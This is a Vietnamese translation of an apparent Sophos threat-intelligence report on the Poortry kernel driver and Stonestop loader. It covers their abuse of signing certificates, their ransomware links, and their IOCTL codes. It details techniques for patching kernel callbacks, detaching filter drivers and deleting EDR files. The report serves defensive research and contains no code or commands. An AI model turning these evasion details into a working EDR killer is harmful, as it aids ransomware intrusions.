Poortry (đôi khi còn được gọi là BurntCigar) là trình điều khiển hạt nhân độc hại được sử dụng kết hợp với trình tải có tên Stonestop của Mandiant, người đầu tiên báo cáo về sự tồn tại của công cụ này. Trình điều khiển bỏ qua Driver Signature Enforcement bằng cách sử dụng bất kỳ kỹ thuật nào trong ba kỹ thuật được mô tả ở trên. Cả hai đều bị che giấu rất nhiều bởi các trình đóng gói thương mại hoặc mã nguồn mở, chẳng hạn như VMProtect, Themida hoặc ASMGuard.

Từ cuối năm 2022 đến giữa năm 2023, các biến thể Poortry mang chứng chỉ Microsoft WHQL. Tuy nhiên, do sự hợp tác giữa Sophos X-Ops và Microsoft, hầu hết các mẫu chứng thực đã ký này đã được tìm thấy và Microsoft đã hủy kích hoạt các tài khoản bị lạm dụng để ký các trình điều khiển đó.

Những người tạo ra Poortry không hề nản lòng; Thay vào đó, họ chuyển sang sử dụng phương pháp Giả mạo dấu thời gian chữ ký hoặc lấy một chứng chỉ bị rò rỉ hợp lệ.

Trong năm qua, chúng tôi đã có thể liên kết việc sử dụng Poortry với các cuộc tấn công liên quan đến ít nhất năm nhóm ransomware lớn:

• CUBA
• Mèo đen
• Medusa
• KhóaBit
• Tiền chuộc

Từ năm 2023, chúng tôi đã quan sát thấy những kẻ tấn công liên tục sử dụng Poortry trong các cuộc tấn công. Một đặc điểm mà chúng tôi quan sát được trong nghiên cứu trước đó là những người tạo ra Poortry thường xuyên thay đổi trình đóng gói của họ, tạo ra một khối lượng các biến thể được sửa đổi đôi chút dựa trên bản gốc. Trong nghiên cứu của mình, chúng tôi đã tìm thấy nhiều biến thể được ký hiệu WHQL khác nhau, được đóng gói với các trình đóng gói thương mại hoặc phi thương mại khác nhau.

Vì địa điểm đó không mở cửa nên những người sáng tạo ra Poortry hiện triển khai các trình điều khiển được ký bằng nhiều chứng chỉ không phải của Microsoft.

Hình bên dưới minh họa dòng thời gian về tên người ký hiệu được quan sát thấy được trình điều khiển tải trọng của Poortry sử dụng trong khoảng thời gian 15 tháng.

Điều đáng nói là đôi khi chúng tôi thực hiện các quan sát của mình trong quá trình ứng phó sự cố, và đôi khi thu thập dưới dạng dữ liệu từ xa. Một điều chúng tôi có thể chắc chắn là tổng số lượng và loại chứng chỉ lớn hơn những gì chúng tôi có thể xác định chỉ bằng quan sát.

Chơi roulette chứng chỉ

Sophos, theo thời gian, đã quan sát thấy một tác nhân đe dọa triển khai các biến thể của Poortry trên các máy khác nhau trong một khu vực duy nhất trong một cuộc tấn công. Các biến thể này chứa cùng một tải trọng, nhưng được ký bằng một chứng chỉ khác với trình điều khiển đầu tiên được sử dụng trong cuộc tấn công. Vào tháng 8 năm 2023, trong một cuộc điều tra của Sophos X-Ops, chúng tôi phát hiện ra rằng những kẻ tấn công đã có được quyền truy cập ban đầu thông qua một công cụ truy cập từ xa có tên là SplashTop. Ngay khi những kẻ tấn công vào mạng, chúng đã triển khai Poortry và Stonestop. Nhưng tên người ký, “bopsoft”, đã được biết đến là một chứng chỉ bị đánh cắp và đã bị chặn bằng một quy tắc hành vi.

Trong vòng 30 giây sau lần thử cuối cùng sử dụng mã có chữ ký của “Bopsoft”, những kẻ tấn công đã tải một trình điều khiển Poortry khác, lần này được ký bởi “Evangel Technology (HK) Limited”. Máy chủ đã nhanh chóng bị cô lập và cuộc tấn công đã bị ngăn chặn.

Chuyển đổi từ EDR killer sang EDR wiper

Vào tháng 7 năm 2024, khi tham gia vào một sự cố mà kẻ thù cố gắng triển khai ransomware RansomHub, Sophos CryptoGuard đã ngăn chặn nỗ lực mã hóa dữ liệu khi các nhà phân tích đóng các điểm truy cập của kẻ tấn công. Một phân tích sau sự cố cho thấy hai tệp thực thi bổ sung đã được thả vào nhiều máy trước cuộc tấn công ransomware cuối cùng:

<d>\Users\<u>\desktop\c7iy3d.exe

<d>\Users\<u>\appdata\local\temp\usnnr.sys

Thông qua sự kết hợp của phân tích tĩnh và động, chúng tôi xác định các tệp là Poortry và Stonestop. Trong số những điểm khác biệt mà chúng tôi quan sát được giữa phiên bản trước và phiên bản này, Poortry hiện cũng có thể xóa hoàn toàn các thành phần EDR quan trọng, thay vì chỉ chấm dứt các quy trình của chúng.

Trend Micro đã báo cáo vào năm 2023 rằng Poortry đã phát triển khả năng xóa tệp khỏi ổ đĩa, nhưng đây là lần đầu tiên chúng tôi quan sát thấy tính năng này được sử dụng trong một cuộc tấn công.

Nhìn kỹ hơn vào các biến thể mới nhất

Cả tệp thực thi Stonestop và trình điều khiển Poortry đều được đóng gói và làm tối nghĩa. Trình tải này được làm tối nghĩa bởi trình đóng gói nguồn đóng có tên là ASMGuard, có trên Github.

Trình điều khiển được ký bằng chứng chỉ mang tên người ký “FEI XIAO.” Sophos X-Ops rất tự tin rằng dấu thời gian chữ ký đã được làm giả để ký trình điều khiển. Đáng chú ý, nó cố gắng ngụy trang bằng cách sử dụng cùng thông tin trong bảng thuộc tính của nó như một trình điều khiển (idmtdi.sys) cho một phần mềm có sẵn trên thị trường, Internet Download Manager của Tonec Inc. Nhưng đó không phải là trình điều khiển của gói phần mềm này – những kẻ tấn công chỉ sao chép thông tin từ nó.

Phiếu thuộc tính trình điều khiển PoorTry có ngày hiệu lực trước khi nó được tạo ra hơn một thập kỷ

Để giải thích rõ hơn, chúng tôi chia luồng thực hiện thành ba giai đoạn riêng biệt.

Giai đoạn khởi tạo

Trong các sự cố mà chúng tôi theo dõi, tác nhân đe dọa thả Poortry và Stonestop cùng nhau vào cùng một thư mục. Khi thực thi, Stonestop sẽ kiểm tra trình điều khiển tương ứng trong thư mục hiện tại.

Thông báo lỗi hiển thị khi trình tải không kết nối được với trình điều khiển hạt nhân.

Tên tệp và tên thiết bị của trình điều khiển đều được mã hóa cứng vào trình tải. Khi bắt đầu, trình tải sẽ lấy xử lý của trình điều khiển hạt nhân độc hại và bắt đầu bắt tay bằng cách gửi chuỗi được mã hóa cứng đến trình điều khiển thông qua lệnh gọi API DeviceIoControl .

Nhìn chung, giao tiếp giữa các thành phần diễn ra thông qua API DeviceIoControl này. Mỗi tính năng do thành phần chế độ hạt nhân cung cấp được kích hoạt bằng cách gửi một mã IOCTL khác nhau. Các biến thể trước đó giao tiếp thông qua trình xử lý IRP_MJ_DEVICE_CONTROL. Biến thể hiện tại sử dụng trình xử lý IRP_MJ_MAXIMUM_FUNCTION để nhận các gói yêu cầu I/O.

Điều đáng nói là các ánh xạ từ mã IOCTL sang tính năng đã thay đổi kể từ lần phân tích cuối cùng của chúng tôi. Ví dụ, lệnh để hủy một quy trình cụ thể theo ID quy trình được kích hoạt bằng cách gửi gói yêu cầu I/O có mã 0x222094. Mẫu mới nhất ánh xạ mã IOCTL 0x222144 sang cùng chức năng.

Kể từ báo cáo năm 2023 của Trend Micro, các nhà phát triển của Poortry đã tăng số lượng mã IOCTL có thể nhận được từ 10 lên 22. Chúng tôi vẫn đang tiếp tục phân tích tất cả các tính năng khả dụng.

Giống như các phiên bản trước, bắt tay được khởi tạo bằng cách gửi một chuỗi được mã hóa cứng đến trình điều khiển. Khi giá trị bắt tay được chấp nhận, nó sẽ đặt một cờ trong nhị phân cho phép các chức năng của trình điều khiển độc hại.

Giai đoạn suy yếu

Giai đoạn thứ hai tập trung vào việc vô hiệu hóa các sản phẩm EDR thông qua một loạt các kỹ thuật khác nhau, chẳng hạn như xóa hoặc sửa đổi các chương trình thông báo của hạt nhân.

Trình điều khiển bảo mật sử dụng một số tính năng khác nhau do HĐH Windows cung cấp để đăng ký lệnh gọi lại khi các sự kiện cụ thể trên hệ thống Windows xảy ra. Một ví dụ là hàm PsSetCreateProcessNotifyRoutine , hàm này thêm một trình điều khiển cung cấp lệnh gọi lại khi một quy trình mới được tạo.

Việc loại bỏ các thói quen gọi lại này thường là bước quan trọng để khiến các sản phẩm EDR trở nên vô dụng. Vào năm 2022, chúng tôi cũng đã viết về một trường hợp tương tự khi ransomware BlackByte lạm dụng trình điều khiển dễ bị tấn công hợp lệ để loại bỏ các thói quen thông báo hạt nhân quan trọng.

Trong giai đoạn thứ hai, chúng tôi quan sát thấy tổng cộng bảy mã IOCTL riêng biệt được gửi đến thành phần chế độ hạt nhân. Chỉ có chức năng được ánh xạ tới 0x222400 được thực thi. Các tính năng khác đã thoát sớm do các cờ cụ thể được đặt trong nhị phân. Chúng tôi nghi ngờ rằng các chức năng không được kích hoạt là thử nghiệm, chỉ được kích hoạt trên các loại hệ thống cụ thể hoặc chỉ bị vô hiệu hóa.

Mã IOCTL và hành vi được ánh xạ của chúng như sau:

0x2220C0 (Disabled)

Khi nhận được, Poortry sẽ nhập một chương trình khởi tạo bổ sung, lấy địa chỉ của nhiều cấu trúc và chức năng quan trọng khác nhau.

0x222100 (Disabled)

Khi nhận được, Poortry cố gắng vô hiệu hóa hoặc kích hoạt lệnh gọi lại kernel thông qua việc sửa đổi cờ PspNotifyEnableMask. Đây là một thủ thuật phổ biến được rootkit sử dụng để kích hoạt hoặc vô hiệu hóa lệnh gọi lại kernel, như được giải thích trong bài viết này .

0x222104 (Disabled)

Khi nhận được mã IOCTL này, Poortry sẽ sửa đổi các lệnh gọi lại kernel của các kiểu đối tượng PsProcess, PsThread và ExDesktopObj. Đây là các cấu trúc dữ liệu chế độ kernel biểu diễn các đối tượng cụ thể trong kernel Windows. Tự giải thích, kiểu đối tượng PsProcess biểu diễn một đối tượng quy trình. Các kiểu đối tượng này cũng chứa một biến trỏ đến các lệnh gọi lại đã đăng ký cho đối tượng tương ứng.

Vì tính năng này đã bị vô hiệu hóa, chúng tôi không chắc đối thủ có thể nhắm đến việc sửa đổi các danh sách gọi lại này như thế nào. Một kịch bản có thể xảy ra là vô hiệu hóa chúng hoàn toàn bằng cách đặt các lệnh gọi lại thành một hàm tùy chỉnh không có bất kỳ chức năng nào, chỉ cần trả về ngay lập tức,

0x222108 (Disabled)

Khi nhận được, Poortry sửa đổi biến CmpCallbackCount để bật hoặc tắt lệnh gọi lại kernel registry. Biến này được sử dụng để đếm số lệnh gọi lại đã đăng ký. Chúng tôi nghi ngờ rằng nếu giá trị này được vá thành 0, các lệnh gọi lại sẽ trở nên vô dụng.

0x22210C (Disabled)

Khi nhận được, Poortry cố gắng xóa trình điều khiển fltMgr.sys khỏi thiết bị \\FileSystem\\FastFat và \\FileSystem\\Ntfs bằng cách sử dụng hàm DeviceIoDetachDevice. Hàm này thường được các trình điều khiển hợp lệ sử dụng để dọn dẹp trong quá trình tắt máy. Tuy nhiên, rootkit có thể sử dụng hàm này để ngăn các trình điều khiển mục tiêu nhận bất kỳ yêu cầu I/O nào nữa.

fltMgr.sys là trình quản lý bộ lọc trên Windows. Trình điều khiển này được sử dụng để mở rộng hoặc sửa đổi chức năng của các chức năng hiện có trên hệ thống Windows. Trình điều khiển này cũng thường được các sản phẩm EDR sử dụng.

Chúng tôi nghi ngờ rằng việc tách nó ra thông qua việc sử dụng IoDetachDevice sẽ khiến các bộ lọc được cài đặt trở nên vô dụng trên hệ thống mục tiêu.

0x2221C0 (Disabled)

Khi nhận được, Poortry nhập các chương trình con để lấy địa chỉ của các trình xử lý hàm chính của ClassPnp.sys và ntfs.sys, chẳng hạn như NtfsFsdClose hoặc NtfsFsdRead của ntfs.sys. Do đó, chúng tôi nghi ngờ rằng chương trình con này có thể được sử dụng như một chương trình con khởi tạo bổ sung để lấy các địa chỉ hàm quan trọng được các tính năng khác sử dụng.

0x222400 (Enabled)

Khi nhận được, Poortry vô hiệu hóa các lệnh gọi lại kernel đã cài đặt thông qua một loạt các kỹ thuật khác nhau. Thành phần chế độ người dùng bao gồm tên của trình điều khiển mục tiêu khi gói yêu cầu I/O được gửi.

Các lệnh gọi lại kernel được cài đặt thông qua PsSetLoadImageNotifyRoutine, PsSetCreateThreadNotifyRoutine và PsSetCreateProcessNotifyRoutine đã được vá. Ở phần mở đầu của hàm gọi lại, Poortry sửa đổi lệnh đầu tiên để trả về số không ngay lập tức khi được nhập.

Cho đến nay, chúng tôi đã xác định được các kỹ thuật sau đây để vô hiệu hóa các lệnh gọi lại hạt nhân và trình điều khiển bảo mật:

• Cấu trúc bên trong được sử dụng bởi các hàm tương ứng PsSetLoadImageNotifyRoutine, PsSetCreateThreadNotifyRoutine và PsSetCreateProcessNotifyRoutine được lặp lại. Nếu lệnh gọi lại thuộc về trình điều khiển bảo mật được gắn thẻ, Do đó, hàm gọi lại đã đăng ký sẽ thoát ngay lập tức mà không thực hiện bất kỳ hoạt động nào theo ý định của nó.
• Nhân Windows triển khai các cấu trúc dữ liệu quan trọng như PsProcess, PsThread và ExDesktopObject đại diện cho các thành phần cơ bản của hệ điều hành Windows. Các cấu trúc này chứa một biến có tên là CallbackList quản lý tất cả các lệnh gọi lại liên quan đến đối tượng cụ thể. Poortry lặp lại danh sách này và nếu lệnh gọi lại thuộc về trình điều khiển bảo mật được gắn thẻ, thì hàm gọi lại đã đăng ký sẽ thoát ngay lập tức mà không thực hiện bất kỳ hoạt động nào theo ý định của nó.
• Một danh sách liên kết nội bộ được sử dụng bởi CmRegisterCallback và CmUnregisterCallback được lặp lại. Danh sách liên kết này chứa các điểm hàm đến các lệnh gọi lại đối tượng và sổ đăng ký đã đăng ký. Nếu lệnh gọi lại thuộc về trình điều khiển bảo mật được gắn thẻ, phần mở đầu của hàm sẽ được vá.
• Poortry sử dụng hàm xuất FltEnumerateFilters từ fltMgr.sys để lặp qua các bộ lọc được áp dụng. Nếu bộ lọc thuộc về trình điều khiển bảo mật được gắn thẻ, phần mở đầu của hàm sẽ được vá.
• Mặc dù chúng tôi không thể kích hoạt trực tiếp chức năng này, chúng tôi đã tìm thấy bằng chứng cho thấy Poortry có thể lạm dụng chức năng IoDetachDevice để tách đối tượng thiết bị khỏi ngăn xếp thiết bị của hệ thống. Trái ngược với chức năng được cung cấp bởi mã IOCTL 0x22210C, nó ít né tránh hơn và chỉ tách thiết bị nếu tên thiết bị khớp với tên đầu vào được gửi qua DeviceIoControl.

Giai đoạn dọn dẹp

Sau khi bị vô hiệu hóa, phần mềm diệt EDR sẽ nhắm đến mục tiêu chấm dứt các quy trình liên quan đến bảo mật và khiến tác nhân EDR trở nên vô dụng bằng cách xóa các tệp quan trọng khỏi đĩa.

Đầu tiên, thành phần chế độ người dùng gửi nhiều yêu cầu I/O với mã IOCTL 0x222144 đến thành phần chế độ hạt nhân, bao gồm ID tiến trình của tiến trình cần kết thúc.

Bộ tải chứa danh sách các đường dẫn được mã hóa cứng trỏ đến vị trí cài đặt sản phẩm EDR. Nó lặp lại tất cả các thư mục con và tệp trong thư mục và xóa các tệp quan trọng đối với tác nhân EDR, chẳng hạn như tệp EXE hoặc tệp DLL bằng cách gửi yêu cầu IOCTL có mã 0x222180 đến trình điều khiển. Yêu cầu đã gửi bao gồm đường dẫn của tệp cần xóa.

Đáng chú ý, thành phần chế độ người dùng có thể hoạt động ở hai chế độ:

• Xóa các tập tin theo loại
• Xóa các tập tin theo tên

Chúng tôi nghi ngờ rằng tác giả đã thêm các chế độ hoạt động này để đảm bảo tính linh hoạt khi nhắm đến các mục tiêu khác nhau. Chúng tôi cũng tin rằng danh sách các đường dẫn được mã hóa cứng trỏ đến các thư mục cài đặt của các sản phẩm EDR thay đổi tùy thuộc vào mục tiêu.

Kết luận

Poortry và trình tải liên quan Stonestop đã trải qua một cải tiến tính năng nghiêm trọng trong 20 tháng kể từ khi Sophos và Microsoft công bố báo cáo chung về việc kẻ giết người EDR lạm dụng cơ chế ký WHQL. Công cụ từng tương đối đơn giản để gỡ bỏ các thành phần bảo vệ điểm cuối “gây rắc rối” đã trở thành, trong chính nó, một con dao đa năng của các khả năng độc hại lạm dụng nguồn cung cấp chứng chỉ ký mã bị đánh cắp hoặc sử dụng không đúng cách gần như vô hạn để vượt qua các biện pháp bảo vệ Xác minh chữ ký trình điều khiển.

Các nhà phát triển Poortry đã biến nó thành một đặc điểm khác biệt của công cụ của họ là nó có thể làm được nhiều hơn là chỉ gỡ bỏ trình điều khiển chống giả mạo EDR hoặc bảo vệ điểm cuối. Poortry đã phát triển thành thứ gì đó giống như một rootkit cũng có các điều khiển hữu hạn đối với một số lệnh gọi API khác nhau được sử dụng để kiểm soát chức năng hệ điều hành cấp thấp. Giờ đây, nó cũng có khả năng xóa sạch kẻ thù của mình – phần mềm bảo mật – ngay khỏi đĩa như một cách để dọn đường cho việc triển khai ransomware.